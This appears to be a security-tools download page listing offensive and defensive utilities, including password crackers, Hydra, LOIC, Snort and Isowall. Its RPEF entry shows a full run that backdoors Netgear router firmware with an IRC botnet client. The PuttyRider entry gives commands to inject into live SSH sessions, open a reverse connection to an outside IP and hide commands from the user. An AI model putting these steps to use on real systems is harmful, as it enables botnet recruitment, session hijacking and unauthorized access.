RPEF - Abstracts and expedites the process of backdooring stock firmware images for consumer/SOHO routers

Router Post-Exploitation Framework

Currently, the framework includes a number of firmware image modules:

'Verified'   - This module is confirmed to work and is stable.

'Unverified' - This module is believed to work or should work with
               little additional effort, but awaits being tested on a
               physical device.

'Testing'    - This module is currently undergoing development and is
               unstable for the time being.  Users should consider this
               module a "work in progress."

'Roadblock'  - Issues have halted progress on this module for the time
               being.  Certain unavailable utilities or significant
               reverse engineering work may be necessary.

For a list of options, run:

./rpef.py -h

For a list of all currently supported firmware targets, run:

./rpef.py -ll

The script is written for Python 2.6 and may require the installation of a few modules. It is typically invoked as:

./rpef.py <firmware image> <output file> <payload>

and accepts a number of optional switches (see -h).
The rules/ directory stores a hierarchy of rules// directories. One module correlates to one firmware checksum (not to one specific router) since multiple routers have been observed to run the exact same firmware. Within each module is properties.json which stores the language and order of operations necessary to unpackage, backdoor, and repackage the target firmware image. The payloads/ directory stores cross-compiled binaries ready for deployment, and the optional dependencies/ directory stores miscellaneous files to aid the process.
The utilities/ directory stores pre-compiled x86 binaries to perform tasks such as packing/unpacking filesystems, compressing/decompressing data (for which no suitable .py module exists), and calculating checksums.
The payloads_src/ directory stores source code for the payloads themselves. All payloads are written from scratch to keep them as small as possible.

Usage

To verbosely generate a firmware image for the WGR614v9 backdoored with a botnet client, run:

./rpef.py WGR614v9-V1.2.30_41.0.44NA.chk WGR614v9-V1.2.30_41.0.44NA_botnet.chk botnet -v

And the process should proceed as follows:

$ ./rpef.py WGR614v9-V1.2.30_41.0.44NA.chk WGR614v9-V1.2.30_41.0.44NA_botnet.chk botnet -v
[+] Verifying checksum
    Calculated checksum: 767c962037b32a5e800c3ff94a45e85e
    Matched target: NETGEAR WGR614v9 1.2.30NA (Verified)
[+] Extracting parts from firmware image
    Step 1: Extract WGR614v9-V1.2.30_41.0.44NA.chk, Offset 58, Size 456708 -> /tmp/tmpOaw1tn/headerkernel.bin
    Step 2: Extract WGR614v9-V1.2.30_41.0.44NA.chk, Offset 456766, Size 1476831 -> /tmp/tmpOaw1tn/filesystem.bin
[+] Unpacking filesystem
    Step 1: unsquashfs-1.0 /tmp/tmpOaw1tn/filesystem.bin -> /tmp/tmpOaw1tn/extracted_fs
        Executing: utilities/unsquashfs-1.0 -dest /tmp/tmpOaw1tn/extracted_fs /tmp/tmpOaw1tn/filesystem.bin

        created 217 files
        created 27 directories
        created 48 symlinks
        created 0 devices
        created 0 fifos
[+] Inserting payload
    Step 1: Rm /tmp/tmpOaw1tn/extracted_fs/lib/modules/2.4.20/kernel/net/ipv4/opendns/openDNS_hijack.o
    Step 2: Copy rules/NETGEAR/WGR614v9_1.2.30NA/payloads/botnet /tmp/tmpOaw1tn/extracted_fs/usr/sbin/botnet
    Step 3: Move /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd.bak
    Step 4: Touch /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
    Step 5: Appendtext "#!/bin/msh
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
[+] INPUT REQUIRED, IP address of IRC server: 1.2.3.4
[+] INPUT REQUIRED, Port of IRC server: 6667
[+] INPUT REQUIRED, Channel to join (include #): #hax      
[+] INPUT REQUIRED, Prefix of bot nick: toteawesome
    Step 6: Appendtext "/usr/sbin/botnet 1.2.3.4 6667 \#hax toteawesome &
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
    Step 7: Appendtext "/usr/sbin/httpd.bak
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
    Step 8: Chmod 777 /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
[+] Building filesystem
    Step 1: mksquashfs-2.1 /tmp/tmpOaw1tn/extracted_fs, Blocksize 65536, Little endian -> /tmp/tmpOaw1tn/newfs.bin
        Executing: utilities/mksquashfs-2.1 /tmp/tmpOaw1tn/extracted_fs /tmp/tmpOaw1tn/newfs.bin -b 65536 -root-owned -le
        Creating little endian 2.1 filesystem on /tmp/tmpOaw1tn/newfs.bin, block size 65536.

        Little endian filesystem, data block size 65536, compressed data, compressed metadata, compressed fragments
        Filesystem size 1442.99 Kbytes (1.41 Mbytes)
            29.38% of uncompressed filesystem size (4912.18 Kbytes)
        Inode table size 2245 bytes (2.19 Kbytes)
            33.63% of uncompressed inode table size (6675 bytes)
        Directory table size 2322 bytes (2.27 Kbytes)
            55.26% of uncompressed directory table size (4202 bytes)
        Number of duplicate files found 3
        Number of inodes 293
        Number of files 218
        Number of fragments 22
        Number of symbolic links  48
        Number of device nodes 0
        Number of fifo nodes 0
        Number of socket nodes 0
        Number of directories 27
        Number of uids 1
            root (0)
        Number of gids 0
[+] Gluing parts together
    Step 1: Touch WGR614v9-V1.2.30_41.0.44NA_botnet.chk
    Step 2: Appendfile /tmp/tmpOaw1tn/headerkernel.bin >> WGR614v9-V1.2.30_41.0.44NA_botnet.chk
    Step 3: Appendfile /tmp/tmpOaw1tn/newfs.bin >> WGR614v9-V1.2.30_41.0.44NA_botnet.chk
[+] Padding image with null bytes
    Step 1: Pad WGR614v9-V1.2.30_41.0.44NA_botnet.chk to size 1937408 with 0 (0x00)
[+] Generating CHK header
    Step 1: packet WGR614v9-V1.2.30_41.0.44NA_botnet.chk rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/compatible_NA.txt rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/ambitCfg.h
        Executing: utilities/packet -k WGR614v9-V1.2.30_41.0.44NA_botnet.chk -b rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/compatible_NA.txt -i rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/ambitCfg.h
[+] Removing temporary files
    Step 1: Rmdir /tmp/tmpOaw1tn/

Download RPEF

Read More

USBPcap - USB Packet capture for Windows (open-source USB Sniffer for Windows)

USBPcap is an open-source USB sniffer for Windows.

USB Packet capture for Windows Tour

Download USBPcap

Read More

CeWL - Custom WordList Generator Tool for Password Cracking

CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

CeWL also has an associated command line app, FAB (Files Already Bagged) which uses the same meta data extraction techniques to create author/creator lists from already downloaded.

Usage

cewl [OPTION] ... URL

--help, -h

Show help

--depth x, -d x

The depth to spider to, default 2

--min_word_length, -m

The minimum word length, this strips out all words under the specified length, default 3

--offsite, -o

By default, the spider will only visit the site specified. With this option it will also visit external sites

--write, -w file

Write the ouput to the file rather than to stdout

--ua, -u user-agent

Change the user agent

-v

Verbose, show debug and extra output

--no-words, -n

Don't output the wordlist

--meta, -a file

Include meta data, optional output file

--email, -e file

Include email addresses, optional output file

--meta_file file

Filename for metadata output

--email_file file

Filename for email output

--meta-temp-dir directory

The directory used used by exiftool when parsing files, the default is /tmp

--count, -c:

Show the count for each of the words found

--auth_type

Digest or basic

--auth_user

Authentication username

--auth_pass

Authentication password

--proxy_host

Proxy host

--proxy_port

Proxy port, default 8080

--proxy_username

Username for proxy, if required

--proxy_password

Password for proxy, if required

--verbose, -v

Verbose

URL

The site to spider.

Change Log

Keeping track of history.

• Version 4.3 - Various spider bug fixes and the introduction of the sorting the results by count
• Version 4.2 - Fixed the Spider gem by overriding the function, also handling #name links correctly
• Version 4.1 - Small bug fixes and added new parameter to set filenames for email and metadata output
• Version 4 - Runs with Ruby 1.9.x and grabs text out of alt and title tags
• Version 3 - Now spiders pages referenced in JavaScript location commands
• Version 2.2 - Data from email addresses and meta data can be written to their own files
• Version 2.1 - Fixed a bug some people were having while using the email option
• Version 2 - Added meta data support
• Version 1 - released

Download CeWL 5.1

Read More

John the Ripper 1.8.0-jumbo-1 - Fast Password Cracker

John the Ripper is a free password cracking software tool. Initially developed for the Unix operating system, it now runs on fifteen different platforms (eleven of which are architecture-specific versions of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix versions (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL, and others.

John the Ripper 1.8.0-jumbo-1 is based on today’s code from the bleeding-jumbo branch on GitHub, which we’ve tried to make somewhat stable lately in preparation for this release.

You may notice that the source code archive size has increased from under 2 MB to over 20 MB. This is primarily due to the included .chr files, which are both bigger and more numerous than pre-1.8 ones. There are lots of source code additions, too.

In fact:

This is probably the biggest single jumbo update so far. The changes are too numerous to summarize – unfortunately, we haven’t been doing that during development, and it’d be a substantial effort to do it now, delaying the release to next year. So we chose to go ahead and release whatever we’ve got. (Of course, there are the many commit messages -but that’s not a summary.)

A really brief summary, though, is that there are new “formats” (meaning more supported hash and “non-hash” types, both on CPU and on GPU), various enhancements to existing ones, mask mode, better support for non-ASCII character sets, and of course all of 1.8.0’s features (including –fork and –node). And new bugs. Oh, and we’re now using autoconf, meaning that you need to “./configure” and “make”, with all the usual pros and cons of this approach. There’s a Makefile.legacy included, so you may “make -f Makefile.legacy” to try and build JtR the old way if you refuse to use autoconf… for now…and this _might_ even work… but you’d better bite the bullet. (BTW, I have no current plans on autoconf’ing non-jumbo versions of JtR.)

Due to autoconf, things such as OpenMP and OpenCL are now enabled automatically (if system support for them is detected during build). When this is undesirable, you may use e.g. “./configure –disable-openmp” or “./configure –disable-openmp-for-fast-formats” and run with –fork to achieve a higher cumulative c/s rate across the fork’ed processes.

Out of over 4800 commits since 1.7.9-jumbo-7, over 2600 are by magnum, making him the top contributor. Other prolific contributors are JimF, Dhiru Kholia, Claudio Andre, Frank Dittrich, Sayantan Datta.

There are also multiple commits by (or attributed to) Lukas Odzioba, ShaneQful, Alexander Cherepanov, rofl0r, bwall, Narendra Kangralkar, Tavis Ormandy, Spiros Fraganastasis, Harrison Neal, Vlatko Kosturjak, Aleksey Cherepanov, Jeremi Gosney, junmuz, Thiebaud Weksteen, Sanju Kholia, Michael Samuel, Deepika Dutta, Costin Enache, Nicolas Collignon, Michael Ledford. There are single commits by (or attributed to) many other contributors as well (including even one by atom of hashcat).

Download John the Ripper 1.8.0-jumbo-1

Read More

PuttyRider - Hijack Putty sessions in order to sniff conversation and inject Linux commands

PuttyRider injects a DLL into a running putty.exe process in order to sniff all communication and inject Linux commands on the remote server.

This can be useful in an internal penetration test when you already have access to a sysadmin’s machine who has a Putty session open to a Linux server. You can use PuttyRider to take control of the remote server using the existing SSH session.

The tool has been recently presented at Defcamp 2014 – a security conference in Romania.

Presentation slides: *http://defcamp.ro/dc14/AdrianFurtuna.pdf*

Examples 
List existing Putty processes and their status (injected / not injected)

PuttyRider.exe -l

Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

PuttyRider.exe -x

Usage

Operation modes:
    -l      List the running Putty processes and their connections
    -w      Inject in all existing Putty sessions and wait for new sessions
            to inject in those also
    -p PID  Inject only in existing Putty session identified by PID.
            If PID==0, inject in the first Putty found
    -x      Cleanup. Remove the DLL from all running Putty instances
    -d      Debug mode. Only works with -p mode
    -c CMD  Automatically execute a Linux command after successful injection
            PuttyRider will remove trailing spaces and '&' character from CMD
            PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD
    -h      Print this help

Output modes:
    -f          Write all Putty conversation to a file in the local directory.
                The filename will have the PID of current putty.exe appended
    -r IP:PORT  Initiate a reverse connection to the specified machine and
                start an interactive session.

Interactive commands (after you receive a reverse connection):
    !status     See if the Putty window is connected to user input
    !discon     Disconnect the main Putty window so it won't display anything
                This is useful to send commands without the user to notice
    !recon      Reconnect the Putty window to its normal operation mode
    CMD         Linux shell commands
    !exit       Terminate this connection
    !help       Display help for client connection

Download PuttyRider

Read More

Windows Password Kracker - Free Windows Password Recovery Software

Windows Password Kracker is a free software to recover the lost or forgotten Windows password. It can quickly recover the original windows password from either LM (LAN Manager) or NTLM (NT LAN Manager) Hash.

Windows encrypts the login password using LM or NTLM hash algorithm. Since these are one way hash algorithms we cannot directly decrypt the hash to get back the original password. In such cases 'Windows Password Kracker' can help in recovering the windows password using the simple dictionary crack method.

Before that you need to dump the password hashes from live or remote windows system using pwdump tool (more details below). Then feed the hash (LM/NTLM) for the corresponding user into 'Windows Password Kracker' to recover the password for that user.

In forensic scenarios, investigator can dump the hashes from the live/offline system and then crack it using 'Windows Password Kracker' to recover the original password. This is very crucial as such a password can then be used to decrypt stored credentials as well as encrypted volumes on that system.

'Windows Password Kracker' uses simple & quicker Dictionary based password recovery technique. By default it comes with sample password file. However you can find good collection of password dictionaries (also called wordlist) here & here.

Though it supports only Dictionary Crack method, you can easily use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with 'Windows Password Kracker'.

It works on both 32 bit & 64 bit windows systems starting from Windows XP to Windows 8.

Download Windows Password Kracker

Read More

Snort 3.0 - Network intrusion prevention and detection system (IDS/IPS)

Snort is the most powerful IPS in the world, setting the standard for intrusion detection. So when we started thinking about what the next generation of IPS looked like we started from scratch.

Features

• Support multiple packet processing threads
• Shared configuration and attribute table
• Use a simple, scriptable configuration
• Make key components pluggable
• Autodetect services for portless configuration
• Support sticky buffers in rules
• Autogenerate reference documentation
• Provide better cross platform support

Download Snort 3

Read More

LOIC 1.0.8 (Low Orbit Ion Cannon) - A network stress testing application

Low Orbit Ion Cannon (LOIC) is an open source network stress testing and denial-of-service attack application, written in C#. LOIC was initially developed by Praetox Technologies, but was later released into the public domain, and now is hosted on several open source platforms.

LOIC performs a denial-of-service (DoS) attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets. The software inspired the creation of an independent JavaScript version called JS LOIC, as well as LOIC-derived web version called Low Orbit Web Cannon. These enable a DoS from a web browser.

Download LOIC 1.0.8

Read More

Android Studio - The official Android IDE

Android Studio is the official IDE for Android application development, based on IntelliJ IDEA. On top of the capabilities you expect from IntelliJ, Android Studio offers:

• Flexible Gradle-based build system
• Build variants and multiple apk file generation
• Code templates to help you build common app features
• Rich layout editor with support for drag and drop theme editing
• Lint tools to catch performance, usability, version compatibility, and other problems
• ProGuard and app-signing capabilities
• Built-in support for Google Cloud Platform, making it easy to integrate Google Cloud Messaging and App Engine
• And much more

Intelligent code editor

At the core of Android Studio is an intelligent code editor capable of advanced code completion, refactoring, and code analysis.

The powerful code editor helps you be a more productive Android app developer.

Code templates and GitHub integration

New project wizards make it easier than ever to start a new project.

Start projects using template code for patterns such as navigation drawer and view pagers, and even import Google code samples from GitHub.

Multi-screen app development

Build apps for Android phones, tablets, Android Wear, Android TV, Android Auto and Google Glass.

With the new Android Project View and module support in Android Studio, it's easier to manage app projects and resources.

Virtual devices for all shapes and sizes

Android Studio comes pre-configured with an optimized emulator image.

The updated and streamlined Virtual Device Manager provides pre-defined device profiles for common Android devices.

Android builds evolved, with Gradle

Create multiple APKs for your Android app with different features using the same project.

Manage app dependencies with Maven.

Build APKs from Android Studio or the command line.

Download Android Studio

Read More

THC-SmartBrute - Finds undocumented and secret commands implemented in a smartcard

This tool finds undocumented and secret commands implemented in a smartcard. An instruction is divided into Class (CLA), Instruction-Number (INS) and the parameters or arguments P1, P2, P3. THC-SMARTBRUTE iterates through all the possible values of CLA and INS to find a valid combination.

Furthermore it tries to find out what parameters are valid for a given class and instruction number.

Requirements

You need a PC/SC compatible smartcard reader that is supported by the PCSC-LITE library.

A list of supported devices can be found here

THC-SMARTBRUTE was developped with the XXX smartcard reader.

Command line arguments

--verbose
        prints a lot of debugging messages to stderr *FIXME*
--undoconly
        only prints found instruction if its not element of the standard
        instruction list
--fastresults
        before iterating through all possible combinates of class and
        instruction-number typical class/instruction-values are verified for
        availability.
        After that the classes 0x00, 0x80 and 0xA0 (GSM) are tried first.
--help
        prints out the usage
--chv1 pin1
        a VERIFY CHV1 instruction with pin1 as argument is executed
--chv2 pin2
        a VERIFY CHV2 instruction with pin2 as argument is executed

--brutep1p2
        finds valid parameter p1 and p2 combinations for the instruction
        the user defined with --cla and --ins .
        For parameter p1 the value 0x00 is assumed.

--brutep3
        find valid p3 values for given --cla, --ins, --p1 and --p2

--cla CLASS
        sets the instruction class to CLASS
--ins INS
        sets the instruction-number to INS
--p1 P1
        sets parameter p1 to P1
--p2 P2
        sets parameter p2 to P2
--p3 P3
        sets parameter p3 to P3

Examples

1. ~$ ./thc-smartbrute
        run thcsmartbrute without any arguments to brute force for valid instructions
2. ~$ ./thc-smartbrute --undoconly
        find valid instructions but only print out non-standard instructions

3. ~$ ./thc-smartbrute --cla 0xA0 --ins 0xA4 --brutep1p2
        find the first two arguments for the GSM instruction SELECT FILE

4. ~$ ./thc-smartbrute --cla 0xA0 --ins 0xA4 --p1 0x00 --p2 0x00 --brutep3
        find the 3rd argument for the already found first two arguments 
        for the GSM instruction SELECT FILE

Download THC-SmartBrute

Read More

AutoScan-Network - Automatically scan your network

AutoScan-Network is a network scanner (discovering and managing application). No configuration is required to scan your network. The main goal is to print the list of connected equipments in your network.

System Requirements :

•Mac OS X 10.5 or later

•Microsoft Windows (XP, Vista)

•GNU/Linux

•Maemo 4

•Sun OpenSolaris

Features:

• Fast network scanner

 • Automatic network discovery

 • TCP/IP scanner

 • Wake on lan functionality

 • Multi-threaded Scanner

 • Port scanner

 • Low surcharge on the network

 • VNC Client

 • Telnet Client

 • SNMP scanner

 • Simultaneous subnetworks scans without human intervention

 • Realtime detection of any connected equipment

 • Supervision of any equipment (router, server, firewall...)

 • Supervision of any network service (smtp, http, pop, ...)

 • Automatic detection of known operatic system (brand and version), you can also add any unknown equipment to the database

 • The graphical interface can connect one or more scanner agents (local or remote)

 • Scanner agents could be deployed all over the network to scan through any type of equipment (router, NAT, etc)

 • Network Intruders detection (in intruders detection mode, all new equipments blacklisted)

 • Complete network tree can be saved in a XML file.

 • Privileged account is not required

Download AutoScan-Network

Read More

THC-Hydra 8.1 - Network Logon Cracker

 A very fast network logon cracker which support many different services.

See feature sets and services coverage page - incl. a speed comparison against ncrack and medusa.Number one of the biggest security holes are passwords, as every password security study shows.

This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.

There are already several login hacker tools available, however none does either support more than one protocol to attack or support parallized connects.

It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.

Currently this tool supports the following protocols:

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

CHANGELOG for 8.1

        ! Development moved to a public github repository: https://github.com/vanhauser-thc/thc-hydra
        
        * David Maciejak, my co-maintainer moved to a different job and country and can not help with Hydra anymore - sadly! Wish you all the best!
        * Added patch from Ander Juaristi which adds h/H header options for http-form-*, great work, thanks!
        * Found login:password combinations are now printed with the name specified (hostname or IP), not always IP
        * Fixed the -M option, works now with many many targets :-)
        * -M option now supports ports, add a colon in between: "host:port", or, if IPv6, "[ipv6ipaddress]:port"
        * Fixed for cisco-enable if an intial Login/Password is used (thanks to joswr1te for reporting)
        * Added patch by tux-mind for better MySQL compilation and an Android patches and Makefile. Thanks!
        * Added xhydra gtk patches by Petar Kaleychev to support -h, -U, -f, -F, -q and -e r options, thanks!
        * Added patch for teamspeak to better identify server errors and auth failures (thanks to Petar Kaleychev)
        * Fixed a crash in the cisco module (thanks to Anatoly Mamaev for reporting)
        * Small fix for HTTP form module for redirect pages where a S= string match would not work (thanks to mkosmach for reporting)
        * Updated configure to detect subversion packages on current Cygwin
        * Fixed RDP module to support the port option (thanks to and.enshin(at)gmail.com)

Download THC-Hydra 8.1

Read More

zANTI 2.0 - Android Network Toolkit

zANTI is a mobile penetration testing toolkit that lets security managers assess the risk level of a network with the push of a button. This easy to use mobile toolkit enables IT Security Administrators to simulate an advanced attacker to identify the malicious techniques they use in the wild to compromise the corporate network.

Scan

Uncover authentication, backdoor, and brute-force attacks, DNS and protocol-specific attacks and rogue access points using a comprehensive range of full customizable network reconnaissance scans.

Diagnose

Enable Security Officers to easily evaluate an organization’s network and automatically diagnose vulnerabilities within mobile devices or web sites using a host of penetration tests including, man-in-the-Middle (MITM), password cracking and metasploit.

Report

Highlight security gaps in your existing network and mobile defenses and report the results with advanced cloud-based reporting through zConsole. zANTI mirrors the methods a cyber-attacker can use to identify security holes within your network. Dash-board reporting enables businesses to see the risks and take appropriate corrective actions to fix critical security issues.

Download zANTI 2.0

Read More

Samurai Web Testing Framework 3.0 - LiveCD Web Pen-testing Environment

The Samurai project team is happy to announce the release of a development version of the Samurai Web Testing Framework. This release is currently a fully functional linux environment that has a number of the tools pre-installed. Our hope is that people who are interested in making this the best live CD for web testing will provide feedback for what they would like to see included on the CD.

The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.

Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.

Tools

• – recon-­‐ng
• – w3af
• – BeEF
• – Burp
•  – OWASP
• – Rat
• – DirBuster
• – CeWL
• – Sqlmap
• – Maltego
• – WebScarab
• – Nmap
• - Zenmap
• – Nikto
• – Metasploit
• – Firefox
• – Tilt
• – Wappalyzer
• – FoxyProxy
• – ZAP
• – Firebug
• – ZAP
• – Burp
•  – Nikto
• – DirBuster
• – RaJ
• – ZAP
• – w3af
• – iMacro
• – CeWL
• – ZAP
• – ZAP TokenGen
• – Burpsuite Sequencer
• – User Agent Switcher
• – Cookies
• – Laudanum
• – BeEF 

Download Samurai Web Testing Framework 3.0

Read More

Hash Manager - Recovering passwords to hashes

The software is designed for recovering passwords to hashes, and it features the following:

• Supports over 330 hashing algorithms.
• Contains over 50 additional utilities for handling hashes, passwords, and dictionaries.
• Unlimited loadable hashes, dictionaries, rules, and masks.
• Multithreading.
• 64 bits.
• Maximum optimization for working with large hash lists.
• Maximum optimization for working with dictionaries.
• Optimization for newest CPU.
• Hashing modules as stand-alone DLL files.
• Convenient control over operation using command files.
• HEX user names and salts.
• Recovery of Unicode passwords.
• And much more.

Changelog:

Version 1.1.
- Added the hybrid attack (AttackMode=4).
- Added new hashing module: PBKDF2 SHA-256(2) - Some bugs fixed.

Version 1.1.1.
- Significantly speeded up all modules using the SHA-1 algorithm.

Version 1.1.2.
- Added new hashing modules:
sha256(md5($pass).$salt)
sha256(sha1($pass).$salt)
PBKDF2 SHA-256(3)

- Added new tools:
ValidateRules
IsOutputFile
RemoveLines

Version 1.1.3.
- Added new hashing modules:
substr(sha1($pass),0,38)
SHA-1(Linkedin)
PBKDF2 JIRA
Blake-224
Blake-256
Blake-384
Blake-512
md5(md5(md5($pass)).$salt)
- Added new PBKDF2 hashing modules.
- Added 14 hashing modules with no specific information where exactly they are used, so we called them Custom(x).dll 

Version 1.1.4.
In the new version:
- Added new hashing modules:
Panama
MD4(Round 1)
BlackBerry ES v10
MongoDB(1)
MongoDB(2)
- Added new tools:
ReverseLines
SwapBytes
HexToBin
BinToHex
CalculateChecksum - supports CRC-64, MD5, and SHA-1.
- Added new dictionary: "Top10000.dic". 

Download Hash Manager

Read More

Isowall - A mini-firewall that completely isolates a target device from the local network

This is a mini-firewall that completely isolates a target device from the local network. This is for allowing infected machines Internet access, but without endangering the local network.

Building

This project depends upon libpcap, and of course a C compiler.

On Debian, the following should work:

# apt-get install git gcc make libpcap-dev
# git clone https://github.com/robertdavidgraham/isowall
# cd isowall
# make

This will put the binary isowall in the local isowall/bin directory.

This should also work on Windows, Mac OS X, xBSD, and pretty much any operating system that supports libpcap.

Running

First, setup a machine with three network interfaces.

The first network interface (like eth0) will be configured as normal, with a TCP/IP stack, so that you can SSH to it.

The other two network interfaces should have no TCP/IP stack, no IP address, no anything. This is the most important configuration step, and the most common thing you'll get wrong. For example, the DHCP software on the box may be configured to automatically send out DHCP requests on these additional interfaces. You have to go fix that so nothing is bound to these interfaces.

To run, simply type:

# ./bin/isowall --internal eth1 --external eth2 -c xxxx.conf

where xxxx.conf contains your configuration, which is described below.

Configuration

The following shows a typical configuration file.

internal = eth1
internal.target.ip = 10.0.0.129
internal.target.mac = 02:60:8c:37:87:f3

external = eth2
external.router.ip = 10.0.0.1
external.router.mac = 66:55:44:33:22:11

allow = 0.0.0.0/0
block = 192.168.0.0/16
block = 10.0.0.0/8
block = 224.0.0.0-255.255.255.255

The target device we are isolating has the indicated IP and MAC address.

Only IPv4 and ARP packets are passed.

Outbound packets must have the following conditions:

• source MAC address equal to internal.target.mac
• destination MAC address equal to external.router.mac
• EtherType of 0x800 or 0x806
• source IPv4 address equal to internal.target.ip
• destination IPv4 address within an allow range, but not in a block range
• if an ARP packet, then the destination IPv4 address must equal that external.router.ip
• if an ARP packet, must be a "request"

Inbound packets must have the following conditions:

• destination MAC address equal to internal.target.mac
• source MAC address equal to external.router.mac
• EtherType of 0x800 or 0x806
• destination IPv4 address equal to internal.target.ip
• source IPv4 address within an allow range, but not in a block range
• if an ARP packet, then the source IPv4 address must equal that external.router.ip
• if an ARP packet, then must be a "reply"

Download Isowall

Read More